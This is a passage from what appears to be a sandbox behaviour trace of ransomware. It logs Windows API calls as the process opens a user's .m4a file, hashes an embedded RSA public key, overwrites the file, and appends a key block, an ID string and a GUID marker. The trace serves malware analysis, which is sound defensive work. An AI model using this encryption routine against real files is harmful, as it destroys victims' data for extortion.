ftCreationTime.dwHighDateTime=0x1d5bc4b, ftLastAccessTime.dwLowDateTime=0xdfddbba0, ftLastAccessTime.dwHighDateTime=0x1d5c323, ftLastWriteTime.dwLowDateTime=0xdfddbba0, ftLastWriteTime.dwHighDateTime=0x1d5c323, nFileSizeHigh=0x0, nFileSizeLow=0x1875, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eAqsDlP2D0nW.m4a", cAlternateFileName="EAQSDL~1.M4A")) returned 1 [0236.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0236.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.960] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eAqsDlP2D0nW.m4a") returned=".m4a" [0236.960] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eAqsDlP2D0nW.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eaqsdlp2d0nw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.961] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=6261) returned 1 [0236.961] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.963] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x184f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.963] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.965] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.965] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x1875, lpOverlapped=0x0) returned 1 [0236.966] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.966] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.966] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.966] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0236.967] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.967] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.967] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.967] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.967] GetLastError () returned 0x0 [0236.968] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.968] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0236.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.968] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.968] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.968] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1880) returned 0x3b81cd0 [0236.968] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95aa0 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003c8 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95ae8 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003e0 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400410 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400470 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400428 [0236.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.969] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90a38 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b83558 [0236.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400410 | out: hHeap=0x620000) returned 1 [0236.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400428 | out: hHeap=0x620000) returned 1 [0236.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400470 | out: hHeap=0x620000) returned 1 [0236.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83558 | out: hHeap=0x620000) returned 1 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400470 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400428 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400410 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0236.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400428 | out: hHeap=0x620000) returned 1 [0236.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400410 | out: hHeap=0x620000) returned 1 [0236.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400470 | out: hHeap=0x620000) returned 1 [0236.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0236.970] GetCurrentThreadId () returned 0x5b4 [0236.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b79a08 [0236.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0236.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.970] GetCurrentThreadId () returned 0x5b4 [0236.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400470 [0236.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400410 [0236.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400428 [0236.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003f8 [0236.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400488 [0236.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400458 [0236.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400440 [0236.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34004a0 [0236.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400440 | out: hHeap=0x620000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400440 [0236.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400458 | out: hHeap=0x620000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400410 | out: hHeap=0x620000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400410 [0236.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0236.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400470 | out: hHeap=0x620000) returned 1 [0236.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0236.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004a0 | out: hHeap=0x620000) returned 1 [0236.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0236.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0236.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400410 | out: hHeap=0x620000) returned 1 [0236.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0236.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0236.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400440 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400488 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400428 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003f8 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003e0 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95ae8 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.974] WriteFile (in: hFile=0x644, lpBuffer=0x3b81cd0*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81cd0*, lpNumberOfBytesWritten=0x39afb14*=0x1870, lpOverlapped=0x0) returned 1 [0236.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.975] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1875, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.975] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0236.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0236.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b81cd0 [0236.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cbd8 | out: hHeap=0x620000) returned 1 [0236.975] WriteFile (in: hFile=0x644, lpBuffer=0x3b81cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b81cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.975] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.975] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.976] CloseHandle (hObject=0x644) returned 1 [0236.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b81cd0 [0236.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: 